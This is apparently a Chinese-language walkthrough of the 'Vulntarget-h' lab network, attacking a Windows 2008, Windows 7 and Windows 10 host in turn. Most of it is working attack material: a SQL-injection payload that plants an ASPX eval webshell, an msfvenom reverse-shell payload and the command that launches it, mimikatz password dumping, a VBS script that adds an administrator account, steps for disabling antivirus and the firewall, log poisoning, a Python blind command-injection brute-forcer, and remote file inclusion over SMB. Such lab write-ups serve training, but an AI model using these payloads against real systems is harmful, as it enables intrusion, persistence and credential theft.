Vulntarget-h

win2008

去探测一下80服务

上传一句话木马

/index.aspx?user_id=1;declare @f int,@g int;
exec sp_oacreate 'Scripting.FileSystemObject',@f output;
EXEC SP_OAMETHOD @f,'CreateTextFile',@f OUTPUT,'C:\inetpub\edrfgyhujikopl\tx.aspx',1;
EXEC sp_oamethod  @f,'WriteLine',null,'<%@ Page Language="Jscript"%><%var a = "un";var b = "safe";Response.Write(eval(Request.Item["z"],a%abb));%>';

发现是个低权限的iis，并且存在双网卡

通过tasklist命令，与网上的在线杀毒识别发现存在360

https://saucer-man.com/avlist/index.html

现在的问题就是如果绕过360，然后成功上线

找到一篇文章，跟着复现即可上线msf

https://zhuanlan.zhihu.com/p/550275126

msf生成木马

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.20.10.5 LPORT=60001 -f psh-reflection > shell.ps1

然后把木马放到temp目录下

进行反弹

然后利用脚本进行反弹

http://172.20.10.5/?user_id=1;
declare @o int;
exec sp_oacreate 'wscript.shell',@o out;
exec sp_oamethod @o,'run',null,'sqlps -ExecutionPolicy bypass -File c:\windows\temp\shell.ps1';

msf成功上线

但是这时候不能进行shell，不然还是会被360防御

需要迁移进程到其他就行了

尝试关闭360，关到主动防御的时候就断了session了

尝试通过猕猴桃进行导出密码

成功导入admin的密码

尝试创建用户进行关闭3389 都没成功

于是用了wp的vbs脚本进行创建用户

set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os)
Set oe=GetObject(os&"/Administrators,group")
Set od=ob.Create("user","tx")
od.SetPassword "pass!@#!23"
od.SetInfo
Set of=GetObject(os&"/tx",user)
oe.add os&"/tx"

通过wscript 1.vbs成功创建tx的admin权限的用户

像个sb一样才发现3389开着的

netstat -an | findstr :3389

上线的第一步肯定就是关掉sbs60

然后关闭防火墙

狠心一下，直接删掉360，真的烦这个

然后cs成功上线

windows7

发现两个网段

进行fscan大保健

(icmp) Target '192.168.153.4' is alive
(icmp) Target '192.168.153.3' is alive
(icmp) Target '192.168.153.128' is alive
icmp alive hosts len is: 3
192.168.153.128:139 open
192.168.153.4:80 open
192.168.153.3:80 open
192.168.153.4:139 open
192.168.153.128:135 open
192.168.153.4:135 open
192.168.153.128:445 open
192.168.153.4:445 open
192.168.153.3:3306 open
192.168.153.3:7680 open

[12/04 15:14:22] [+] received output:
alive ports len is: 10
start vulscan
NetInfo:
[*]192.168.153.4
   [->]WIN-7DSM1JVE9PO
   [->]172.20.10.5
   [->]192.168.153.4
   [->]240e:431:1220:95d9:9190:1903:c61e:297b
   [->]240e:431:1220:7975:9190:1903:c61e:297b
[+] 192.168.153.4	MS17-010	(Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
NetInfo:
[*]192.168.153.128
   [->]WIN-HF4NQED9HKF
   [->]192.168.153.128
[*] 192.168.153.128      __MSBROWSE__\WIN-HF4NQED9HKF   Windows 7 Enterprise 7601 Service Pack 1
[*] 192.168.153.4        WORKGROUP\WIN-7DSM1JVE9PO   Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[*] 192.168.153.128  (Windows 7 Enterprise 7601 Service Pack 1)
[*] WebTitle:http://192.168.153.4      code:200 len:683    title:SiteGenerator - DataValidation : SQL Injection : Basic

[12/04 15:14:23] [+] received output:
[*] WebTitle:http://192.168.153.3      code:200 len:64     title:<script>xss<script> – 鍙堜竴涓猈ordPress绔欑偣

[12/04 15:14:32] [+] received output:
宸插畬鎴� 12/12
scan end

这里发现了153.3这台机器存在wordpress

进行frp的socks代理搭建

发现153.3显示太慢了，就把ip改成了153.129

通过wp-scan扫描出来CVE-2016-10956

https://www.exploit-db.com/exploits/40290

发现每次生成的access.log.xxxxxx

xxxx是每天早上八点这个时间戳

进行

proxychains curl -v 'http://192.168.153.129/<?=phpinfo()?>'

成功回显phpinfo()

但是目前没办法getshell

转换机器向153.128

扑面而来的CTF题型，唤醒了我死去的记忆

但是我没做出来

所以用了靶场wp的脚本

import requests
import string
import socket
import socks

socks.set_default_proxy(socks.SOCKS5, "82.156.174.51", 23333)                    #换上自己第一层的frp代理
socket.socket = socks.socksocket

command = "type C:\\phpstudy_pro\\COM\\a.txt >C:\\phpstudy_pro\\a"              #读取提示的文本，原样写入到：C:\\phpstudy_pro\\a
base64 = "certutil -encode C:\\phpstudy_pro\\a C:\\phpstudy_pro\\b"             #-encode，将文件编码为Base64，a的内容被base64编码
base64_clean = "findstr /V \"^---\" C:\\phpstudy_pro\\b > C:\\phpstudy_pro\\c"  #findstr /V ，/V参数，只打印不包含匹配的行。
echo_b_bat = "echo @echo off>>C:\\phpstudy_pro\\b.bat"
echo_b_bat2 = "echo (for /f \"delims=\" %%i in ('type \"C:\\phpstudy_pro\\c\"') do (set /p =%%i^<nul))^>\"C:\\phpstudy_pro\\d\">>C:\\phpstudy_pro\\b.bat"
start = "C:\\phpstudy_pro\\b.bat"
echo_a_bat = "echo @echo off>>C:\\phpstudy_pro\\a.bat"
echo_a_bat1 = "echo findstr /b %1 \"C:\\phpstudy_pro\\d\">>C:\\phpstudy_pro\\a.bat"
echo_a_bat2 = "echo IF ERRORLEVEL 1 echo a^&^&goto end >>C:\\phpstudy_pro\\a.bat"   #如果失败，就输出a，并且跳转到end
echo_a_bat3 = "echo IF ERRORLEVEL 0 ping 127.0.0.1>>C:\\phpstudy_pro\\a.bat"        #如果成功，输出ping的结果
echo_end = "echo :end>>C:\\phpstudy_pro\\a.bat"
cmd = [command, base64, base64_clean,echo_b_bat, echo_b_bat2, start, echo_a_bat,echo_a_bat1,echo_a_bat2,echo_a_bat3,echo_end]
url = "http://192.168.153.128/"
for i in cmd:
    data = {
        "shell": i
    }
    requests.post(url, data=data)
print("[+]init success")
bp = string.ascii_letters + string.digits + "+/="   #ascii_letters是生成所有字母，从a-z和A-Z,digits是生成所有数字0-9，bp即是字典
cmd_base64 = ""
for i in range(1,65535):
    for s in bp:
        data = {
            "shell": "C:\\phpstudy_pro\\a.bat " + cmd_base64 + s
        }
        response = requests.post(url, data=data)
        time = response.elapsed.total_seconds()
        if time > 3:
            cmd_base64 += s
            print(cmd_base64)
            break

ZHN1aWphZGRqc2Z2b3MucGhw然后base64解码得到dsuijaddjsfvos.php

直接上蚁剑连接

发现是个低权限的用户

发现存在火绒

还好我有过火绒的🐎 嘻嘻嘻

成功上线

windows10

直接RDP登录

这时候就尝试用共享

在c盘创建一个RFI文件夹，里面存放phpinfo

然后设置该文件夹的属性，进行设置共享-> Everyone -> 读/写 权限

然后关闭共享密码保护

这时候就可以尝试包含phpinfo.php了

http://192.168.153.129/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=\\192.168.153.128\RFI\phpinfo.php

然后往该文件夹写入一句话进行连接

属于本地组administrator成员

然后上线cs